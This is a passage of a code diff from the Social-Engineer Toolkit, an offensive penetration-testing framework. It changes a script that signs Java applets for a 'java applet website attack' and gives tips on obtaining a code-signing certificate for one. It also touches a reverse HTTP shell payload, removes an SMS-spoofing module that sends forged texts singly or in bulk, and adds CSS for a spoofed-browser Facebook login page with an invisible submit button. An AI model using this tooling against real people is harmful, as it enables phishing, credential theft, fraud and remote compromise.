  Good news is, the process to do that is extremely simple. All in all, it should cost roughly around $300-350 to setup your
- business, buy a code signing certificate, and publish an applet to be whatever you want.
+ business, buy a code signing certificate, and publish an applet to be whatever you want. You can also do a "DBA" or doing
+ business as which is also much easier to use.
 """
 
-core.print_error("*** WARNING ***")
-core.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
-core.print_error("*** WARNING ***")
+print_error("*** WARNING ***")
+print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
+print_error("*** WARNING ***")
 
 # use flag is in case someone already has a code signing certificate, in that case it bypasses the "no" answer
 use_flag = 0
 
-# prompt for a different certificate
-prompt = raw_input(core.setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
-# if we selected yes if we generated a code signing certificate
-if prompt == "yes" or prompt == "y":
-    # prompt the user to import the code signing certificate
-    cert_path=raw_input(core.setprompt("0", "Path to the code signing certificate file"))
-    if not os.path.isfile(cert_path):
-        # loop forever
-        while 1 == 1:
-            core.print_error("ERROR:Filename not found. Try again.")
-            # re-prompt if we didn't file the filename
-            cert_path=raw_input(core.setprompt("0", "Path to the .cer certificate file"))
-            # if we find the filename then break out of loop
-            if os.path.isfile(cert_path): break
+print """
+[--------------------------------]
+Initial Selection Process
+[--------------------------------]
 
-    # here is where we import the certificate
-    try:
-        core.print_info("Importing the certificate into SET...")
+There are a few choice here, the first is do you want to import your own Java Applet that you've already signed. If you already have the certificate and want to use the SET applet, you can find an unsigned version under src/html/unsigned/unsigned.jar. If you want to use this menu, you can as well.
 
+Option 1 will import your own SIGNED applet that you already have.
+Option 2 will go through the process of either creating the code signing certificate to be submitted to the CA or allow you to import your own certificate. If you already have your certificate and want to have SET handle the signing, this is the option you want.
 
+1. Import your own java applet into SET (needs to be SIGNED).
+2. Either create a code-signing csr or use a code-signing certificate you already own.
+"""
+firstprompt = raw_input("Enter your choice [1-2]: ")
+if firstprompt == "": firstprompt == "2"
 
-        subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
-        # trigger that we have our certificate already and bypass the request process below
-        use_flag = 1
+# if we want to import our own java applet
+if firstprompt == "1":
+    newpath = raw_input("Enter the path to the .jar file: ")
+    if not os.path.isfile(newpath):
+        while 1:
+            print_error("Unable to locate the file. Please try again.")
+            newpath = raw_input("Enter the path to the .jar file: ")
+            if os.path.isfile(newpath): break
 
-    # exception here in case it was already imported before
-    except: pass
+    # import into SET
+    print_status("Importing the applet into SET for weaponization...")
+    shutil.copyfile(newpath, setdir + "/Signed_Update.jar.orig")
+    shutil.copyfile(newpath, setdir + "/Signed_Update.jar")
+    print_status("The applet has been successfully imported into SET.")
 
-# this will exit the menu
-if prompt == "quit" or prompt == "q":
-    use_flag = 0
-    prompt = "yes"
-    cert_path = ""
-# if we have a cert now or if we need to generate one
-if use_flag == 1 or prompt == "no" or prompt == "n":
-
-    # if we selected no we need to create one
-    if prompt == "no" or prompt == "n":
-        # get the stuff ready to do it
-        core.print_info("Generating the initial request for Verisign...")
-        # grab input from user, fqdn
-        answer1=raw_input(core.setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
-        # grab name of organizaton
-        answer2=raw_input(core.setprompt("0", "Name of the organization"))
-        # grab two letter country code
-        answer3=raw_input(core.setprompt("0", "Two letter country code (ex. US)"))
-        # if blank, default to US
-        if answer3 == "": answer3 = "US"
-        # grab state
-        answer4=raw_input(core.setprompt("0", "State"))
-        # grab city
-        answer5=raw_input(core.setprompt("0", "City"))
-        # generate the request crl
-        subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' % (answer1,answer2,answer3, answer4, answer5), shell=True).wait()
-        core.print_info("Exporting the cert request to text file...")
-        # generate the request and export to certreq
-        subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
-        core.print_status("Export successful. Exported certificate under the SET root under certreq.txt")
-        core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
-        core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
-        core.print_info("When finished, enter the path to the .cer file below")
-        # cert_path is used for the certificate path when generating
-
-        cert_path = raw_input(core.setprompt("0", "Path for the code signing certificate file (.spc file)"))
-        # if we can't find the filename
+# if we want to either generate a certificate or use our own certificate this is it
+if firstprompt == "2":
+    # prompt for a different certificate
+    prompt = raw_input(setprompt("0", "Have you already generated a code signing-certificate? [yes|no]")).lower()
+    # if we selected yes if we generated a code signing certificate
+    if prompt == "yes" or prompt == "y":
+        # prompt the user to import the code signing certificate
+        cert_path=raw_input(setprompt("0", "Path to the code signing certificate file (provided by CA)"))
         if not os.path.isfile(cert_path):
+            # loop forever
             while 1 == 1:
-                core.print_error("ERROR:Filename not found. Please try again.")
-                # re-prompt if file name doesn't exist
-                cert_path = raw_input(core.setprompt("0", "Path to the .cer certificate file from Verisign"))
-                # if we detect file, then break out of loop
+                print_error("ERROR:Filename not found. Try again.")
+                # re-prompt if we didn't file the filename
+                cert_path=raw_input(setprompt("0", "Path to the .cer certificate file"))
+                # if we find the filename then break out of loop
                 if os.path.isfile(cert_path): break
 
-        # import the certificate
-        subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
+        # here is where we import the certificate
+        try:
+            print_info("Importing the certificate into SET...")
 
-# if our certificate is in the data store
-if os.path.isfile(cert_path):
-    # sign the applet with the imported certificate
-    subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" % (definepath), shell=True).wait()
-    # move it into our html directory
-    subprocess.Popen("mv Signed_Update.jar %s/Signed_Update.jar.orig" % (setdir), shell=True).wait()
-    # move back to original directory
-    core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")
+            subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
+            # trigger that we have our certificate already and bypass the request process below
+            use_flag = 1
+
+        # exception here in case it was already imported before
+        except: pass
+
+    # this will exit the menu
+    if prompt == "quit" or prompt == "q":
+        use_flag = 0
+        prompt = "yes"
+        cert_path = ""
+    # if we have a cert now or if we need to generate one
+    if use_flag == 1 or prompt == "no" or prompt == "n":
+
+        # if we selected no we need to create one
+        if prompt == "no" or prompt == "n":
+            # get the stuff ready to do it
+            print_info("Generating the initial request for Verisign...")
+            # grab input from user, fqdn
+            answer1=raw_input(setprompt("0", "FQDN (ex. www.thisisafakecert.com)"))
+            # grab name of organizaton
+            answer2=raw_input(setprompt("0", "Name of the organization"))
+            # grab two letter country code
+            answer3=raw_input(setprompt("0", "Two letter country code (ex. US)"))
+            # if blank, default to US
+            if answer3 == "": answer3 = "US"
+            # grab state
+            answer4=raw_input(setprompt("0", "State"))
+            # grab city
+            answer5=raw_input(setprompt("0", "City"))
+            # generate the request crl
+            subprocess.Popen('keytool -genkey -alias MyCert -keyalg RSA -keysize 2048 -dname "CN=%s,O=%s,C=%s,ST=%s,L=%s"' % (answer1,answer2,answer3, answer4, answer5), shell=True).wait()
+            print_info("Exporting the cert request to text file...")
+            # generate the request and export to certreq
+            subprocess.Popen("keytool -certreq -alias MyCert > %s/certreq.txt" % (definepath), shell=True).wait()
+            print_status("Export successful. Exported certificate under the SET root under certreq.txt")
+            print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
+            print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
+            print_info("When finished, enter the path to the .cer file below")
+            # cert_path is used for the certificate path when generating
+
+            cert_path = raw_input(setprompt("0", "Path for the code signing certificate file (.spc file)"))
+            # if we can't find the filename
+            if not os.path.isfile(cert_path):
+                while 1 == 1:
+                    print_error("ERROR:Filename not found. Please try again.")
+                    # re-prompt if file name doesn't exist
+                    cert_path = raw_input(setprompt("0", "Path to the .cer certificate file from Verisign"))
+                    # if we detect file, then break out of loop
+                    if os.path.isfile(cert_path): break
+
+            # import the certificate
+            subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
+
+    # if our certificate is in the data store
+    if os.path.isfile(cert_path):
+        # sign the applet with the imported certificate
+        subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" % (definepath), shell=True).wait()
+        # move it into our html directory
+        subprocess.Popen("mv Signed_Update.jar %s/Signed_Update.jar.orig" % (setdir), shell=True).wait()
+        # move back to original directory
+        print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")

src/payloads/set_payloads/http_shell.py

@@ -5,7 +5,7 @@
 #  AES Encrypted Reverse HTTP Shell by:
 #
 #         Dave Kennedy (ReL1K)
-#      http://www.secmaniac.com
+#      http://www.trustedsec.com
 #
 ##########################################################################################################################
 #
@@ -95,7 +95,7 @@ try:
 except IndexError:
     print " \nAES Encrypted Reverse HTTP Shell by:"
     print "        Dave Kennedy (ReL1K)"
-    print "      http://www.secmaniac.com"
+    print "      http://www.trustedsec.com"
     print "Usage: shell.exe <reverse_ip_address> <rport>"
     time.sleep(0.1)
     sys.exit()

src/sms/client/SMSProviders.py

@@ -1,78 +0,0 @@
-#!/usr/bin/env python
-import urllib
-import httplib
-import re
-import socket
-
-def send_sohoos_sms(to, origin, text):
-    try:
-        params = urllib.urlencode({'body': text, 'from': origin, 'to': to})
-        headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
-        conn = httplib.HTTPConnection('sohoos.com')
-        conn.request('POST', '/crm/managekit/widget/submitsms', params, headers)
-        response = conn.getresponse()
-        if (response.status == 302 and
-            response.reason == "Found" and
-            response.getheader("location") == "/crm/managekit/widget/thankssms"):
-            print "\nSMS sent\n"
-        else:
-            print "\nError while sending SMS\n"
-    except:
-        print "\nError sending SMS"
-
-def send_smsgang_sms(to, origin, text, pincode):
-    try:
-        params = urllib.urlencode({
-                                   "tonumber" : to,
-                                   "senderid" : origin,
-                                   "pincode" : pincode,
-                                   "iso_msg" : text,
-                                   "unicode_msg" : "",
-                                   "B2" : "Send SMS"
-                                    })
-        headers = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
-                    "Content-type": "application/x-www-form-urlencoded; charset=UTF-8" }
-        conn = httplib.HTTPConnection('www.smsgang.com')
-        conn.request('POST', '/sendsms.php?langfile=en', params, headers)
-        response = conn.getresponse()
-        if (response.status == 200 and
-                re.search("Your SMS was sent", response.read())):
-            print "\nSMS sent\n"
-        else:
-            print "\nError while sending SMS\n"
-    except:
-        print "\nError sending SMS"
-
-def send_lleidanet_sms(to, origin, text, user, password, email):
-    try:
-        params = urllib.urlencode({
-                                   'xml' : '<?xml version="1.0" encoding="iso-8859-1" ?><sms><user>'+user+'</user><password>'+password+'</password><src>'+origin+'</src><dst><num>'+to+'</num></dst><txt>'+text+'</txt><delivery_receipt>'+email+'</delivery_receipt></sms>'
-                                   })
-        headers = {}
-        conn = httplib.HTTPConnection('sms.lleida.net')
-        conn.request('POST', '/xmlapi/smsgw.cgi', params, headers)
-        response = conn.getresponse()
-        if (response.status == 200 and
-            re.search("<status>100</status>", response.read())):
-            print "\nSMS sent\n"
-        else:
-            print "\nError while sending SMS\n"
-    except:
-        print "\nError sending SMS"
-
-def send_android_emu_sms(origin, text):
-    try:
-        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-        s.connect(("localhost", 5554))
-        #s.recv(4096)
-        command = 'sms send '
-        s.send(command + origin + " " + text + "\x0d\x0a")
-        android_response = s.recv(4096)
-        s.close
-        if (android_response.find("OK") >= 0 ):
-            print "\nSMS sent\n"
-        else:
-            print "\nError sending SMS, did you install and have Android Emulator running?"
-            print "Try: http://developer.android.com/guide/developing/tools/emulator.html"
-    except:
-        print "\nError sending SMS"

src/sms/client/custom_sms_template.py

@@ -1,22 +0,0 @@
-#!/usr/bin/env python
-import random
-from src.core import setcore as core
-
-try:
-    print ("\n         [****]  Custom Template Generator [****]\n")
-    author=raw_input(core.setprompt(["7"], "Name of the author"))
-    filename=randomgen=random.randrange(1,99999999999999999999)
-    filename=str(filename)+(".template")
-    origin=raw_input(core.setprompt(["7"], "Source phone # of the template"))
-    subject=raw_input(core.setprompt(["7"], "Subject of the template"))
-    body=raw_input(core.setprompt(["7"], "Body of the message"))
-    filewrite=file("src/templates/sms/%s" % (filename), "w")
-    filewrite.write("# Author: "+author+"\n#\n#\n#\n")
-    filewrite.write('ORIGIN='+'"'+origin+'"\n\n')
-    filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
-    filewrite.write('BODY='+'"'+body+'"\n')
-    print "\n"
-    filewrite.close()
-except Exception, e:
-    core.print_error("An error occured:")
-    core.print_error("ERROR:" + str(e))

src/sms/client/sms_client.py

@@ -1,69 +0,0 @@
-#!/usr/bin/env python
-
-import sys
-from src.core import setcore as core
-from src.core.setcore import debug_msg, mod_name
-
-me = mod_name()
-while 1:
-    print """
-   SMS Attack Menu
-
-   There are diferent attacks you can launch in the context of SMS spoofing,
-   select your own.
-
-    1.  SMS Attack Single Phone Number
-    2.  SMS Attack Mass SMS
-
-    99. Return to SMS Spoofing Menu\n"""
-
-    attack_option=raw_input(core.setprompt("0",""))
-
-    if attack_option == 'exit':
-        core.exit_set()
-    # exit
-    if attack_option == '1':
-        print("\nSingle SMS Attack")
-        to = raw_input(core.setprompt(["7"], "Send sms to"))
-        phones = list()
-        phones.append(to)
-        sys.path.append("src/sms/client/")
-        try:
-            # ugly but "compliant" with SET architecture
-            debug_msg(me,"importing 'src.sms.client.sms_launch'",1)
-            reload(sms_launch)
-            sms_launch.phones = phones
-            sms_launch.launch()
-        except:
-            import sms_launch
-            sms_launch.phones = phones
-            sms_launch.launch()
-        break
-    if attack_option == '2':
-        # TO DO: MASS SMS ATTACK
-        print("\nMass SMS Attack")
-        try:
-            address_book_path = raw_input(core.setprompt(["7"], "Enter the phone's address book absolute path"))
-            address_book = open(address_book_path, "r")
-            phones = list()
-            phone = address_book.readline()
-            while phone:
-                phones.append(phone)
-                print("\n" + phone)
-                phone = address_book.readline()
-        except:
-            break
-        sys.path.append("src/sms/client/")
-        try:
-            # ugly but "compliant" with SET architecture
-            debug_msg(me,"importing 'src.sms.client.sms_launch'",1)
-            reload(sms_launch)
-            sms_launch.phones = phones
-            sms_launch.launch()
-        except:
-            import sms_launch
-            sms_launch.phones = phones
-            sms_launch.launch()
-        break
-    if attack_option == '99':
-        break

src/sms/client/sms_launch.py

@@ -1,161 +0,0 @@
-#!/usr/bin/env python
-
-from SMSProviders import *
-import re
-import glob
-import os
-from src.core.setcore import *
-
-def launch():
-    while 1:
-        print("""
-1.  Pre-Defined Template
-2.  One-Time Use SMS
-
-99. Cancel and return to SMS Spoofing Menu
-""")
-        template_choice = raw_input(setprompt(["7"], "Use a predefined template or craft a one time SMS?"))
-        # if predefined template go here
-        if template_choice == '1':
-            # set path for
-            path = 'src/templates/sms/'
-            filewrite=file(setdir + "/sms.templates", "w")
-            counter=0
-            # Pull all files in the templates directory
-            for infile in glob.glob(os.path.join(path, '*.template')):
-                infile=infile.split("/")
-                # grab just the filename
-                infile=infile[3]
-                counter=counter+1
-                # put it in a format we can use later in a file
-                filewrite.write(infile+" "+str(counter)+"\n")
-            # close the file
-            filewrite.close()
-            # read in formatted filenames
-            fileread=file(setdir + "/sms.templates","r").readlines()
-            print "Below is a list of available templates:\n"
-            for line in fileread:
-                line=line.rstrip()
-                line=line.split(" ")
-                filename=line[0]
-                # read in file
-                fileread2=file("src/templates/sms/%s" % (filename),"r").readlines()
-                for line2 in fileread2:
-                    match=re.search("SUBJECT=", line2)
-                    if match:
-                        line2=line2.rstrip()
-                        line2=line2.split("=")
-                        line2=line2[1]
-                        # strip double quotes
-                        line2=line2.replace('"', "")
-                        # display results back
-                        print line[1]+": "+line2
-
-            # allow user to select template
-            choice=raw_input(setprompt(["7"], "Select template"))
-            for line in fileread:
-                # split based off of space
-                line=line.split(" ")
-                # search for the choice
-                match=re.search(str(choice), line[1])
-                if match:
-                    extract=line[0]
-                    fileopen=file("src/templates/sms/"+str(extract), "r").readlines()
-                    for line2 in fileopen:
-                        match2=re.search("ORIGIN=", line2)
-                        if match2:
-                            origin=line2.replace('"', "")
-                            origin=origin.split("=")
-                            origin=origin[1]
-                        match3=re.search("SUBJECT=", line2)
-                        if match3:
-                            subject=line2.replace('"', "")
-                            subject=subject.split("=")
-                            subject=subject[1]
-                        match4=re.search("BODY=", line2)
-                        if match4:
-                            body=line2.replace('"', "")
-                            body=body.replace(r'\n', " \n ")
-                            body=body.split("=")
-                            body=body[1]
-
-            break;
-        if template_choice == '2':
-            try:
-                origin = raw_input(setprompt(["7"], "Source number phone"))
-                body = raw_input(setprompt(["7"], "Body of the message, hit return for a new line. Control+c when finished"))
-                while body != 'sdfsdfihdsfsodhdsofh':
-                    try:
-                        body+=("\n")
-                        body+=raw_input("Next line of the body: ")
-                    except KeyboardInterrupt: break
-            except KeyboardInterrupt: pass
-            break;
-
-        if template_choice == '99':
-            break;
-
-    if template_choice != '3':
-        while 1:
-            print("""
-Service Selection
-
-There are diferent services you can use for the SMS spoofing, select
-your own.
-
-1.  SohoOS (buggy)
-2.  Lleida.net (pay)
-3.  SMSGANG (pay)
-4.  Android Emulator (need to install Android Emulator)
-
-99. Cancel and return to SMS Spoofing Menu
-""")
-            service_option = raw_input(setprompt(["7"], ""))
-            # exit
-            if service_option == '1':
-                break
-            if service_option == '2':
-                break
-            if service_option == '3':
-                break
-            if service_option == '4':
-                break
-            if service_option == '99':
-                break
-
-    if template_choice != '3' and service_option != '99':
-        #sohoOS service
-        if service_option == '1':
-            for to in phones:
-                send_sohoos_sms(to.rstrip(), origin.rstrip(), body.rstrip())
-            # Finish here then return to main menu
-            print_status("SET has completed!")
-            return_continue()
-
-        #Lleida.net service
-        if service_option == '2':
-            user = raw_input(setprompt(["7"], "Your Lleida.net user"))
-            password = raw_input(setprompt(["7"], "Your Lleida.net password"))
-            email = raw_input(setprompt(["7"], "Email for the receipt (optional)"))
-            for to in phones:
-                send_lleidanet_sms(to.rstrip(), origin.rstrip(), body.rstrip(), user, password, email)
-            # Finish here then return to main menu
-            print_status("SET has completed!")
-            return_continue()
-
-        #SMSGANG service
-        if service_option == '3':
-            pincode = raw_input(setprompt(["7"], "Your SMSGANG pincode"))
-            for to in phones:
-                send_smsgang_sms(to.rstrip(), origin.rstrip(), body.rstrip(), pincode)
-            # Finish here then return to main menu
-            print_status("SET has completed!")
-            return_continue()
-
-        #Andriod Emulator service
-        if service_option == '4':
-            for to in phones:
-                send_android_emu_sms(origin.rstrip(), body.rstrip())
-            # Finish here then return to main menu
-            print_status("SET has completed!")
-            return_continue()

src/webattack/fsattack/FACEBOOK/css/facebox.css

@@ -0,0 +1,80 @@
+#facebox {
+  position: absolute;
+  top: 0;
+  left: 0;
+  z-index: 100;
+  text-align: left;
+}
+
+
+#facebox .popup{
+  position:relative;
+  border:3px solid rgba(0,0,0,0);
+  -webkit-border-radius:5px;
+  -moz-border-radius:5px;
+  border-radius:5px;
+  -webkit-box-shadow:0 0 18px rgba(0,0,0,0.4);
+  -moz-box-shadow:0 0 18px rgba(0,0,0,0.4);
+  box-shadow:0 0 18px rgba(0,0,0,0.4);
+}
+
+#facebox .content {
+  display:table;
+  width: 370px;
+  padding: 10px;
+  background: #fff;
+  -webkit-border-radius:4px;
+  -moz-border-radius:4px;
+  border-radius:4px;
+}
+
+#facebox .content > p:first-child{
+  margin-top:0;
+}
+#facebox .content > p:last-child{
+  margin-bottom:0;
+}
+
+#facebox .close{
+  position:absolute;
+  top:5px;
+  right:5px;
+  padding:2px;
+  background:#fff;
+}
+#facebox .close img{
+  opacity:0.3;
+}
+#facebox .close:hover img{
+  opacity:1.0;
+}
+
+#facebox .loading {
+  text-align: center;
+}
+
+#facebox .image {
+  text-align: center;
+}
+
+#facebox img {
+  border: 0;
+  margin: 0;
+}
+
+#facebox_overlay {
+  position: fixed;
+  top: 0px;
+  left: 0px;
+  height:100%;
+  width:100%;
+}
+
+.facebox_hide {
+  z-index:-100;
+}
+
+.facebox_overlayBG {
+  background-color: #000;
+  z-index: 99;
+}

src/webattack/fsattack/FACEBOOK/css/style.css

@@ -0,0 +1,143 @@
+html.fullscreened {
+  overflow-y: hidden;
+  background-color: #fff;
+}
+
+.fullscreened #container { display: none; }
+
+
+#tables {
+
+ position: center;
+ background: url(../img/login.png) no-repeat;
+
+}
+#textBox {
+
+     /* Updated in JS */
+       position:absolute;
+       left:590px;
+       top:225px;
+		
+   }		
+#textBoxTwo {
+     /* Updated in JS */
+       position:absolute;
+       left:590px;
+       top:260px;
+			
+
+   }
+	
+#textBoxThree {
+        /* Updated in JS */
+       position:absolute;
+       left:570px;
+       top:285px;
+
+   }	
+
+#buttonSubmit {
+      /* Updated in JS */
+       position:absolute;
+       left:570px;
+       top:310px;
+	/* IE 8 */
+	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=80)";
+	/* IE 5-7 */
+	filter: alpha(opacity=80);
+	 /* Netscape */
+	 -moz-opacity: 0.1;
+	/* Safari 1.x */
+	-khtml-opacity: 0.1;
+	/* Good browsers */
+	 opacity: 0.0; 	
+	
+   }		
+
+#spoofSite {
+  background-color: #fff;
+  left: 0;
+  margin: 0 auto;
+  overflow-y: scroll;
+  position: fixed;
+  width: 100%;
+  z-index: 2;
+
+  /* Updated in JS */
+  top: 100px;
+  height: 500px;
+}
+.not-fullscreened #spoofSite { display: none; }
+
+
+#spoofHeader {
+  position: fixed;
+  top: 0;
+  left: 0;  
+  width: 100%;
+  z-index: 2;
+}
+.not-fullscreened #spoofHeader { display: none; }
+
+#spoofMenu, #spoofBrowser { width: 100%; }
+
+
+/* Menu (OS X only) */
+
+.osx #spoofMenu { height: 22px; }
+.windows #spoofMenu, .linux #spoofMenu { height: 0; }
+
+.chrome.osx #spoofMenu {
+  background: url(../img/menu-osx-chrome-left.png) left top no-repeat, url(../img/menu-osx-right.png) right top no-repeat, url(../img/menu-osx-bg.png) left top repeat-x;
+}
+
+.firefox.osx #spoofMenu {
+  background: url(../img/menu-osx-firefox-left.png) left top no-repeat, url(../img/menu-osx-right.png) right top no-repeat, url(../img/menu-osx-bg.png) left top repeat-x;
+}
+
+.safari.osx #spoofMenu {
+  background: url(../img/menu-osx-safari-left.png) left top no-repeat, url(../img/menu-osx-right.png) right top no-repeat, url(../img/menu-osx-bg.png) left top repeat-x;
+}
+
+/* Browser UI */
+
+.chrome.osx #spoofBrowser {
+  background: url(../img/browser-osx-chrome-left.png) left top no-repeat, url(../img/browser-osx-chrome-right.png) right top no-repeat, url(../img/browser-osx-chrome-bg.png) left top repeat-x;
+  height: 72px;
+}
+
+.chrome.windows #spoofBrowser {
+  background: url(../img/browser-windows-chrome-left.png) left top no-repeat, url(../img/browser-windows-chrome-right.png) right top no-repeat, url(../img/browser-windows-chrome-bg.png) left top repeat-x;
+  height: 61px;
+}
+
+.chrome.linux #spoofBrowser {
+  background: url(../img/browser-linux-chrome-left.png) left top no-repeat, url(../img/browser-linux-chrome-right.png) right top no-repeat, url(../img/browser-linux-chrome-bg.png) left top repeat-x;
+  height: 86px;
+}
+
+.firefox.osx #spoofBrowser {
+  background: url(../img/browser-osx-firefox-center.png) center top no-repeat, url(../img/browser-osx-firefox-left.png) left top no-repeat, url(../img/browser-osx-firefox-right.png) right top no-repeat, url(../img/browser-osx-firefox-bg.png) left top repeat-x;
+  height: 87px;
+}
+
+.firefox.windows #spoofBrowser {
+  background: url(../img/browser-windows-firefox-left.png) left top no-repeat, url(../img/browser-windows-firefox-right.png) right top no-repeat, url(../img/browser-windows-firefox-bg.png) left top repeat-x;
+  height: 63px;
+}
+
+.firefox.linux #spoofBrowser {
+  background: url(../img/browser-linux-firefox-left.png) left top no-repeat, url(../img/browser-linux-firefox-right.png) right top no-repeat, url(../img/browser-linux-firefox-bg.png) left top repeat-x;
+  height: 90px;
+}
+
+.safari.osx #spoofBrowser {
+  background: url(../img/browser-osx-safari-center.png) center top no-repeat, url(../img/browser-osx-safari-left.png) left top no-repeat, url(../img/browser-osx-safari-right.png) right top no-repeat, url(../img/browser-osx-safari-bg.png) left top repeat-x;
+  height: 72px;
+}
+
+.safari.windows #spoofBrowser {
+  background: url(../img/browser-windows-safari-center.png) center top no-repeat, url(../img/browser-windows-safari-left.png) left top no-repeat, url(../img/browser-windows-safari-right.png) right top no-repeat, url(../img/browser-windows-safari-bg.png) left top repeat-x;
+  height: 72px;
+}